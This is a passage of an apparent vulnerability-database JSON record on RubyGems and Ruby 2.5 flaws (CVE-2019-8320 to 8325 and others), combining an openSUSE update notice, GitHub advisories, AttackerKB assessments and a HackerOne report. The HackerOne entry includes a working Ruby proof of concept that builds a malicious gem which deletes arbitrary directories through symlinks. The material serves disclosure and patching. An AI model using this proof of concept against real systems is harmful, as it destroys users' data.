symlink when decompressing tar\n (bsc#1130627)\n - CVE-2019-8321: Escape sequence injection vulnerability in verbose\n (bsc#1130623)\n - CVE-2019-8322: Escape sequence injection vulnerability in gem\n owner (bsc#1130622)\n - CVE-2019-8323: Escape sequence injection vulnerability in API response\n handling (bsc#1130620)\n - CVE-2019-8324: Installing a malicious gem may lead to arbitrary code\n execution (bsc#1130617)\n - CVE-2019-8325: Escape sequence injection vulnerability in errors\n (bsc#1130611)\n\n\n Ruby 2.5 was updated to 2.5.3:\n\n This release includes some bug fixes and some security fixes.\n\n Security issues fixed:\n\n - CVE-2018-16396: Tainted flags are not propagated in Array#pack and\n String#unpack with some directives (bsc#1112532)\n - CVE-2018-16395: OpenSSL::X509::Name equality check does not work\n correctly (bsc#1112530)\n\n Ruby 2.5 was updated to 2.5.1:\n\n This release includes some bug fixes and some security fixes.\n\n Security issues fixed:\n\n - CVE-2017-17742: HTTP response splitting in WEBrick (bsc#1087434)\n - CVE-2018-6914: Unintentional file and directory creation with directory\n traversal in tempfile and tmpdir (bsc#1087441)\n - CVE-2018-8777: DoS by large request in WEBrick (bsc#1087436)\n - CVE-2018-8778: Buffer under-read in String#unpack (bsc#1087433)\n - CVE-2018-8779: Unintentional socket creation by poisoned NUL byte in\n UNIXServer and UNIXSocket (bsc#1087440)\n - CVE-2018-8780: Unintentional directory traversal by poisoned NUL byte in\n Dir (bsc#1087437)\n\n - Multiple vulnerabilities in RubyGems were fixed:\n\n - CVE-2018-1000079: Fixed path traversal issue during gem installation\n allows to write to arbitrary filesystem locations (bsc#1082058)\n - CVE-2018-1000075: Fixed infinite loop vulnerability due to negative\n size in tar header causes Denial of Service (bsc#1082014)\n - CVE-2018-1000078: Fixed XSS vulnerability in homepage attribute when\n displayed via gem server (bsc#1082011)\n - CVE-2018-1000077: Fixed that missing URL validation on spec home\n attribute allows malicious gem to set an invalid homepage URL\n (bsc#1082010)\n - CVE-2018-1000076: Fixed improper verification of signatures in tarball\n allows to install mis-signed gem (bsc#1082009)\n - CVE-2018-1000074: Fixed unsafe Object Deserialization Vulnerability in\n gem owner allowing arbitrary code execution on specially crafted YAML\n (bsc#1082008)\n - CVE-2018-1000073: Fixed path traversal when writing to a symlinked\n basedir outside of the root (bsc#1082007)\n\n Other changes:\n\n - Fixed Net::POPMail methods modify frozen literal when using default arg\n - ruby: change over of the Japanese Era to the new emperor May 1st 2019\n (bsc#1133790)\n - build with PIE support (bsc#1130028)\n\n\n Changes in ruby-bundled-gems-rpmhelper:\n\n - Add a new helper for bundled ruby gems.\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2019-07-21T12:21:26", "published": "2019-07-21T12:21:26", "id": "OPENSUSE-SU-2019:1771-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html", "title": "Security update for ruby-bundled-gems-rpmhelper, ruby2.5 (important)", "type": "suse", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}], "github": [{"lastseen": "2020-08-17T22:54:47", "bulletinFamily": "software", "cvelist": ["CVE-2019-8320"], "description": "A Directory Traversal issue was discovered in RubyGems 2.7.6 and later through 3.0.2. Before making new directories or touching files (which now include path-checking code for symlinks), it would delete the target destination. If that destination was hidden behind a symlink, a malicious gem could delete arbitrary files on the user's machine, presuming the attacker could guess at paths. Given how frequently gem is run as sudo, and how predictable paths are on modern systems (/tmp, /usr, etc.), this could likely lead to data loss or an unusable system.", "edition": 3, "modified": "2020-08-17T19:25:14", "published": "2019-06-20T16:06:15", "id": "GHSA-5X32-C9MF-49CC", "href": "https://github.com/advisories/GHSA-5x32-c9mf-49cc", "title": "Directory traversal in RubyGems", "type": "github", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2020-08-17T22:54:47", "bulletinFamily": "software", "cvelist": ["CVE-2019-8322"], "description": "An issue was discovered in RubyGems 2.6 and later through 3.0.2. The gem owner command outputs the contents of the API response directly to stdout. Therefore, if the response is crafted, escape sequence injection may occur.", "edition": 3, "modified": "2020-08-17T19:24:01", "published": "2019-06-20T16:06:00", "id": "GHSA-MH37-8C3G-3FGC", "href": "https://github.com/advisories/GHSA-mh37-8c3g-3fgc", "title": "Escape sequence injection in RubyGems", "type": "github", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-08-17T22:54:47", "bulletinFamily": "software", "cvelist": ["CVE-2019-8323"], "description": "An issue was discovered in RubyGems 2.6 and later through 3.0.2. Gem::GemcutterUtilities#with_response may output the API response to stdout as it is. Therefore, if the API side modifies the response, escape sequence injection may occur.", "edition": 3, "modified": "2020-08-17T19:29:53", "published": "2019-06-20T16:05:57", "id": "GHSA-3H4R-PJV6-CPH9", "href": "https://github.com/advisories/GHSA-3h4r-pjv6-cph9", "title": "Escape sequence injection in RubyGems", "type": "github", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-08-17T22:54:47", "bulletinFamily": "software", "cvelist": ["CVE-2019-8324"], "description": "An issue was discovered in RubyGems 2.6 and later through 3.0.2. A crafted gem with a multi-line name is not handled correctly. Therefore, an attacker could inject arbitrary code to the stub line of gemspec, which is eval-ed by code in ensure_loadable_spec during the preinstall check.", "edition": 3, "modified": "2020-08-17T19:27:12", "published": "2019-06-20T16:06:11", "id": "GHSA-76WM-422Q-92MQ", "href": "https://github.com/advisories/GHSA-76wm-422q-92mq", "title": "Code injection in RubyGems", "type": "github", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-17T22:54:47", "bulletinFamily": "software", "cvelist": ["CVE-2019-8325"], "description": "An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since Gem::CommandManager#run calls alert_error without escaping, escape sequence injection is possible. (There are many ways to cause an error.)", "edition": 3, "modified": "2020-08-17T19:26:19", "published": "2019-06-20T16:08:21", "id": "GHSA-4WM8-FJV7-J774", "href": "https://github.com/advisories/GHSA-4wm8-fjv7-j774", "title": "Escape sequence injection in RubyGems", "type": "github", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "hackerone": [{"lastseen": "2020-12-01T09:31:42", "bulletinFamily": "bugbounty", "bounty": 500.0, "cvelist": ["CVE-2019-8320"], "description": "In 2.7.6, the safety of symlink is confirmed with `mkdir_p_safe`,\nBefore that `FileUtils.rm_rf destination` is running.\nTherefore, if `tmp/dir` is specified after `tmp -> /tmp`, the following `/tmp/dir` is deleted.\n\n### Proof of concept\n\n#### builder.rb\n\n```ruby\nrequire 'rubygems/package'\n\nclass GemBuiler\n\n def initialize spec, path\n @_build_time = Time.now\n @_checksums = {}\n @_signer = Gem::Security::Signer.new nil, nil, \"\"\n @_spec = spec\n @_path = path\n end\n\n def build &block\n Gem.load_yaml\n require 'rubygems/security'\n\n @_spec.mark_version\n\n File.open @_path, 'wb' do |gem_io|\n Gem::Package::TarWriter.new gem_io do |gem|\n add_metadata gem\n add_contents gem, &block\n add_checksums gem\n end\n end\n end\n\n def add_checksums tar\n Gem.load_yaml\n\n checksums_by_algorithm = Hash.new { |h, algorithm| h[algorithm] = {} }\n\n @_checksums.each do |name, digests|\n digests.each do |algorithm, digest|\n checksums_by_algorithm[algorithm][name] = digest.hexdigest\n end\n end\n\n tar.add_file_signed 'checksums.yaml.gz', 0444, @_signer do |io|\n gzip_to io do |gz_io|\n YAML.dump checksums_by_algorithm, gz_io\n end\n end\n end\n\n def add_contents tar, &block\n digests = tar.add_file_signed 'data.tar.gz', 0444, @_signer do |io|\n gzip_to io do |gz_io|\n Gem::Package::TarWriter.new gz_io, &block\n end\n end\n\n @_checksums['data.tar.gz'] = digests\n end\n\n def add_metadata tar \n digests = tar.add_file_signed 'metadata.gz', 0444, @_signer do |io|\n gzip_to io do |gz_io|\n gz_io.write @_spec.to_yaml\n end\n end\n\n @_checksums['metadata.gz'] = digests\n end\n\n def gzip_to io\n gz_io = Zlib::GzipWriter.new io, Zlib::BEST_COMPRESSION\n gz_io.mtime = @_build_time\n\n yield gz_io\n ensure\n gz_io.close\n end\nend\n\nspec = Gem::Specification.new do |s|\n s.name = 'hello'\n s.version = '0.0.1'\n s.summary = 'hello summary'\n s.author= \"test\"\nend\n\n\n# create evil gem\n\nrm = GemBuiler.new(spec, \"rm_dir.gem\")\nrm.build do |data_tar|\n data_tar.add_symlink \"tmp\", \"/tmp\", 16877\n data_tar.add_symlink \"tmp/dir\", \".\", 16877\nend\n```\n\n#### execute\n\n```\n$ ls /tmp/dir\nfile\n\n$ ruby builder.rb\n\n$ gem unpack rm_dir.gem\nERROR: While executing gem ... (Gem::Package::PathError)\n installing into parent path tmp/dir of /xxx/yyy/zzz/... is not allowed\n\n$ ls /tmp/dir\nls: /tmp/dir: No such file or directory\n````\n\n## Impact\n\nUnrelated directories will be deleted when unpacking or installing a specially crafted gem.\nSince `mkdir_p_safe` produces an error, only one can be specified, but it will be deleted recursively.", "modified": "2019-04-11T11:53:38", "published": "2018-02-18T10:55:08", "id": "H1:317321", "href": "https://hackerone.com/reports/317321", "type": "hackerone", "title": "RubyGems: Delete directory using symlink when decompressing tar", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}], "attackerkb": [{"lastseen": "2020-11-18T06:45:56", "bulletinFamily": "info", "cvelist": ["CVE-2019-8324"], "description": "An issue was discovered in RubyGems 2.6 and later through 3.0.2. A crafted gem with a multi-line name is not handled correctly. Therefore, an attacker could inject arbitrary code to the stub line of gemspec, which is eval-ed by code in ensure_loadable_spec during the preinstall check.\n\n \n**Recent assessments:** \n \n**busterb** at May 09, 2019 5:57pm UTC reported:\n\nRubygems has a vulnerability that allows for arbitrary code execution while a gem is being installed. However, it\u2019s unclear how this is any worse than either using the malicious gem itself, or using the ability of gems to compile and execute arbitrary build instructions in the first place. It is interesting to be able to name a gem a particular way to create code execution. But you have to convince someone to install your gem in the first place. I presume that rubygems.org now prevents malicious gems from being published, but it would be interesting to see.\n\nAssessed Attacker Value: 1 \nAssessed Attacker Value: 3**0xEmma** at March 15, 2020 7:14pm UTC reported:\n\nRubygems has a vulnerability that allows for arbitrary code execution while a gem is being installed. However, it\u2019s unclear how this is any worse than either using the malicious gem itself, or using the ability of gems to compile and execute arbitrary build instructions in the first place. It is interesting to be able to name a gem a particular way to create code execution. But you have to convince someone to install your gem in the first place. I presume that rubygems.org now prevents malicious gems from being published, but it would be interesting to see.\n\nAssessed Attacker Value: 1 \nAssessed Attacker Value: 3**avishwakarma-r7** at March 17, 2020 5:28am UTC reported:\n\nRubygems has a vulnerability that allows for arbitrary code execution while a gem is being installed. However, it\u2019s unclear how this is any worse than either using the malicious gem itself, or using the ability of gems to compile and execute arbitrary build instructions in the first place. It is interesting to be able to name a gem a particular way to create code execution. But you have to convince someone to install your gem in the first place. I presume that rubygems.org now prevents malicious gems from being published, but it would be interesting to see.\n", "modified": "2020-03-17T00:00:00", "published": "2020-03-17T00:00:00", "id": "AKB:B2EBBF0E-24E2-4432-8E53-7E8A540D8917", "href": "https://attackerkb.com/topics/7lNzC8sTL1/installing-a-malicious-gem-may-lead-to-arbitrary-code-execution", "type": "attackerkb", "title": "Installing a malicious gem may lead to arbitrary code execution", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}